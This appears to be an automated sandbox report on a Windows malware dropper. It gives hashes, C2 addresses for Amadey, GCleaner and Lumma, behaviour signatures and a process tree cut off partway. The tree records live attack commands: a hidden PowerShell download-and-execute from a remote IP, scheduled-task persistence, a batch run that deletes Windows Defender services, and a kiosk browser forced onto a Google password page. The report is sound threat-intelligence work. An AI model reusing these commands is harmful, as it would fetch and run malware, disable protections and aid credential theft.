Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/04/2025, 03:01

General

  • Target

    2025-04-05_651cce28cb328014db2aa67beb299d98_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    651cce28cb328014db2aa67beb299d98

  • SHA1

    c48a43ceaf77424b36442b365255312cfed70b62

  • SHA256

    11b24a02e9953184f9dd73569592fc4990b18cd2255e7cece0ae164631e3a8e9

  • SHA512

    c70674ce01acbb6febae898317b217408a35cea4cf17ebcedfe553422979bcc4ad2a1afac4769297c0f445323d8436e497ebe0cd6c1cfe0eca2144856b74ca7e

  • SSDEEP

    24576:CqDEvCTbMWu7rQYlBQcBiT6rprG8a09u:CTvC/MTQYxsWR7a09

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

gcleaner

C2

185.156.73.98

45.91.200.135

Extracted

Family

lumma

C2

https://pepperiop.digital/oage

https://jrxsafer.top/shpaoz

https://plantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://cosmosyf.top/GOsznj

https://yjrxsafer.top/shpaoz

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://xrfxcaseq.live/gspaz

https://6grxeasyw.digital/xxepw

https://gkrxspint.digital/kendwz

https://erhxhube.run/pogrs

https://28jrxsafer.top/shpaoz

https://kadvennture.top/GKsiio

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Detects MeshAgent payload 1 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Meshagent family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 21 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 35 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 64 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 59 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 30 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-05_651cce28cb328014db2aa67beb299d98_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-05_651cce28cb328014db2aa67beb299d98_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:5388
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn N3ZaDmaWjQH /tr "mshta C:\Users\Admin\AppData\Local\Temp\LoyefcaE0.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5816
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn N3ZaDmaWjQH /tr "mshta C:\Users\Admin\AppData\Local\Temp\LoyefcaE0.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2084
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\LoyefcaE0.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3648
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HAO6OXSFWJUROS828QP23LNWCAJ6Y3QT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5340
        • C:\Users\Admin\AppData\Local\TempHAO6OXSFWJUROS828QP23LNWCAJ6Y3QT.EXE
          "C:\Users\Admin\AppData\Local\TempHAO6OXSFWJUROS828QP23LNWCAJ6Y3QT.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1356
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2284
            • C:\Users\Admin\AppData\Local\Temp\10455080101\apple.exe
              "C:\Users\Admin\AppData\Local\Temp\10455080101\apple.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5032
              • C:\Users\Admin\AppData\Local\Temp\272.exe
                "C:\Users\Admin\AppData\Local\Temp\272.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2316
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C302.tmp\C303.tmp\C304.bat C:\Users\Admin\AppData\Local\Temp\272.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5184
                  • C:\Users\Admin\AppData\Local\Temp\272.exe
                    "C:\Users\Admin\AppData\Local\Temp\272.exe" go
                    9⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:4436
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C44A.tmp\C44B.tmp\C44C.bat C:\Users\Admin\AppData\Local\Temp\272.exe go"
                      10⤵
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:5212
                      • C:\Windows\system32\sc.exe
                        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                        11⤵
                        • Launches sc.exe
                        PID:820
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:5996
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        11⤵
                        • Delays execution with timeout.exe
                        PID:2332
                      • C:\Windows\system32\sc.exe
                        sc stop ddrver
                        11⤵
                        • Launches sc.exe
                        PID:1884
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:4308
                      • C:\Windows\system32\takeown.exe
                        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:2320
                      • C:\Windows\system32\icacls.exe
                        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:824
                      • C:\Windows\system32\sc.exe
                        sc stop "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:5128
                      • C:\Windows\system32\sc.exe
                        sc delete "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:3848
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                        11⤵
                          PID:3424
                        • C:\Windows\system32\sc.exe
                          sc stop "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:664
                        • C:\Windows\system32\sc.exe
                          sc delete "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:2312
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                          11⤵
                            PID:1816
                          • C:\Windows\system32\sc.exe
                            sc stop "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:3144
                          • C:\Windows\system32\sc.exe
                            sc delete "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:1492
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                            11⤵
                              PID:2640
                            • C:\Windows\system32\sc.exe
                              sc stop "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:2404
                            • C:\Windows\system32\sc.exe
                              sc delete "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:5276
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                              11⤵
                                PID:3600
                              • C:\Windows\system32\sc.exe
                                sc stop "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:3920
                              • C:\Windows\system32\sc.exe
                                sc delete "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:4180
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                11⤵
                                • Modifies security service
                                PID:3876
                              • C:\Windows\system32\sc.exe
                                sc stop "SgrmBroker"
                                11⤵
                                • Launches sc.exe
                                PID:5204
                              • C:\Windows\system32\sc.exe
                                sc delete "SgrmBroker"
                                11⤵
                                • Launches sc.exe
                                PID:6084
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                11⤵
                                  PID:5744
                                • C:\Windows\system32\sc.exe
                                  sc stop "SecurityHealthService"
                                  11⤵
                                  • Launches sc.exe
                                  PID:3760
                                • C:\Windows\system32\sc.exe
                                  sc delete "SecurityHealthService"
                                  11⤵
                                  • Launches sc.exe
                                  PID:1228
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                  11⤵
                                    PID:2960
                                  • C:\Windows\system32\sc.exe
                                    sc stop "webthreatdefsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:1500
                                  • C:\Windows\system32\sc.exe
                                    sc delete "webthreatdefsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:2556
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                    11⤵
                                      PID:5756
                                    • C:\Windows\system32\sc.exe
                                      sc stop "webthreatdefusersvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:4404
                                    • C:\Windows\system32\sc.exe
                                      sc delete "webthreatdefusersvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:5052
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                      11⤵
                                        PID:4476
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdNisDrv"
                                        11⤵
                                        • Launches sc.exe
                                        PID:2240
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdNisDrv"
                                        11⤵
                                        • Launches sc.exe
                                        PID:2344
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                        11⤵
                                          PID:4380
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdBoot"
                                          11⤵
                                          • Launches sc.exe
                                          PID:456
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdBoot"
                                          11⤵
                                          • Launches sc.exe
                                          PID:1916
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                          11⤵
                                            PID:2084
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdFilter"
                                            11⤵
                                            • Launches sc.exe
                                            PID:3564
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdFilter"
                                            11⤵
                                            • Launches sc.exe
                                            PID:3360
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                            11⤵
                                              PID:728
                                            • C:\Windows\system32\sc.exe
                                              sc stop "SgrmAgent"
                                              11⤵
                                              • Launches sc.exe
                                              PID:100
                                            • C:\Windows\system32\sc.exe
                                              sc delete "SgrmAgent"
                                              11⤵
                                              • Launches sc.exe
                                              PID:636
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                              11⤵
                                                PID:4484
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecWfp"
                                                11⤵
                                                • Launches sc.exe
                                                PID:4068
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecWfp"
                                                11⤵
                                                • Launches sc.exe
                                                PID:4932
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                11⤵
                                                  PID:244
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecFlt"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:5464
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecFlt"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:2628
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                  11⤵
                                                    PID:3484
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecCore"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:6100
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecCore"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:4032
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                    11⤵
                                                      PID:3548
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                      11⤵
                                                        PID:1724
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                        11⤵
                                                          PID:1720
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                          11⤵
                                                            PID:4720
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                            11⤵
                                                              PID:4732
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop ddrver
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:4736
                                                            • C:\Windows\system32\sc.exe
                                                              sc delete ddrver
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:4716
                                                  • C:\Users\Admin\AppData\Local\Temp\10455420101\0BiRjfE.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10455420101\0BiRjfE.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4848
                                                  • C:\Users\Admin\AppData\Local\Temp\10455900101\ffc4d6d6fa.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10455900101\ffc4d6d6fa.exe"
                                                    6⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of SetThreadContext
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4816
                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10455900101\ffc4d6d6fa.exe"
                                                      7⤵
                                                      • Downloads MZ/PE file
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3056
                                                  • C:\Users\Admin\AppData\Local\Temp\10455910101\b6d14bc198.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10455910101\b6d14bc198.exe"
                                                    6⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:1100
                                                  • C:\Users\Admin\AppData\Local\Temp\10455920101\0d72453cb3.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10455920101\0d72453cb3.exe"
                                                    6⤵
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    PID:2524
                                                  • C:\Users\Admin\AppData\Local\Temp\10455930101\170b67c52f.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10455930101\170b67c52f.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:3864
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM firefox.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2628
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM chrome.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4724
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM msedge.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1624
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM opera.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:720
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM brave.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4388
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                      7⤵
                                                        PID:3388
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                          8⤵
                                                          • Checks processor information in registry
                                                          • Modifies registry class
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:4844
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1960 -prefsLen 27099 -prefMapHandle 1964 -prefMapSize 270279 -ipcHandle 2072 -initialChannelId {93cf7760-faf6-466a-88ae-7faf286ba2d0} -parentPid 4844 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4844" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                            9⤵
                                                              PID:1000
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2464 -prefsLen 27135 -prefMapHandle 2468 -prefMapSize 270279 -ipcHandle 2476 -initialChannelId {940364f7-1392-4607-91af-727357b1d937} -parentPid 4844 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4844" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                              9⤵
                                                                PID:5280
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3676 -prefsLen 25213 -prefMapHandle 3680 -prefMapSize 270279 -jsInitHandle 3684 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3708 -initialChannelId {7802b2dc-c990-4205-813f-b3832383ffe4} -parentPid 4844 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4844" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                9⤵
                                                                • Checks processor information in registry
                                                                PID:4488
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3940 -prefsLen 27325 -prefMapHandle 3944 -prefMapSize 270279 -ipcHandle 4012 -initialChannelId {d2705987-dc35-46ed-938e-f535f52f2213} -parentPid 4844 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4844" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                9⤵
                                                                  PID:3468
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2928 -prefsLen 34824 -prefMapHandle 4392 -prefMapSize 270279 -jsInitHandle 4396 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4404 -initialChannelId {9f1aec2b-022c-4fbe-bb46-ad6494885ee4} -parentPid 4844 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4844" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:572
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5096 -prefsLen 35012 -prefMapHandle 5100 -prefMapSize 270279 -ipcHandle 5108 -initialChannelId {72d0ec7a-ca2f-4540-b9a9-763243bf48d4} -parentPid 4844 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4844" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:2028
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5260 -prefsLen 32900 -prefMapHandle 5264 -prefMapSize 270279 -jsInitHandle 5268 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5272 -initialChannelId {6c4dcb99-79a2-49df-a03d-b333b73a4cde} -parentPid 4844 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4844" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:3556
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5484 -prefsLen 32952 -prefMapHandle 5488 -prefMapSize 270279 -jsInitHandle 5492 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5260 -initialChannelId {447ad5fb-a51c-4eaf-be07-8ff20d331e8d} -parentPid 4844 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4844" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:4856
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5676 -prefsLen 32952 -prefMapHandle 5680 -prefMapSize 270279 -jsInitHandle 5684 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5688 -initialChannelId {dc16d25e-09c5-4ed3-bb74-f8c53b905715} -parentPid 4844 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4844" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:2136
                                                          • C:\Users\Admin\AppData\Local\Temp\10455940101\2d283911b6.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10455940101\2d283911b6.exe"
                                                            6⤵
                                                            • Modifies Windows Defender DisableAntiSpyware settings
                                                            • Modifies Windows Defender Real-time Protection settings
                                                            • Modifies Windows Defender TamperProtection settings
                                                            • Modifies Windows Defender notification settings
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Windows security modification
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3544
                                                          • C:\Users\Admin\AppData\Local\Temp\10455950101\e615aaefb6.exe
